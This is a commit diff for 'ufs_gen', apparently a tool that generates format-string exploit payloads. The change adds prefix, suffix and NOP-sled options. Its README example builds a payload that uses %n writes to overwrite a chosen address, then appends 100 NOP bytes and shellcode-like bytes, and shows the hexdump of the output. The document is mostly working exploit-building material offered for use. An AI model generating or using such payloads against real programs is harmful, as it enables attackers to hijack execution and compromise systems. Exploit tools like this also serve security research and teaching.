summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--README20
-rw-r--r--main.c9
2 files changed, 27 insertions, 2 deletions
diff --git a/README b/README
index b2d9679..d8d3358 100644
--- a/README
+++ b/README
@@ -38,12 +38,32 @@ is not 4 bytes long, there is very few chances that it would work correctly.
The support of printf(payload) directly (i.e. without a temporary buffer) is
also planned.
+We support the option --prefix and --suffix which respectively prepend and
+append their argument to the payload.
+
+We also support the option --sfxnops which adds n NOP byte (0x90) between the
+payload and the suffix
+
Example
=======
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
+user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
+user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C
+NOP bytes are at offset 52 (0x34)
+suffix is at offset 152 (0x98)
+00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".|
+00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5|
+00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x|
+00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............|
+00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
+*
+00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D|
+0000009f
+
+
License
=======
diff --git a/main.c b/main.c
index 4f4dc97..ac07f54 100644
--- a/main.c
+++ b/main.c
@@ -50,8 +50,13 @@ static int suffix_nops_g = 0;
__attribute__((noreturn))
static void usage(const char *arg0)
{
- fprintf(stderr, "usage: %s --override addr --with addr --stackidx idx\n", arg0);
- fprintf(stderr, " %s --override addr --with addr --stackidx idx --addrsize size\n", arg0);
+ (void)arg0;
+
+ fputs("usage:\n\n", stderr);
+ fputs(
+ "ufs_gen "
+ "[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
+ " --override addr --with addr --stackidx idx\n", stderr);
exit(EX_USAGE);
}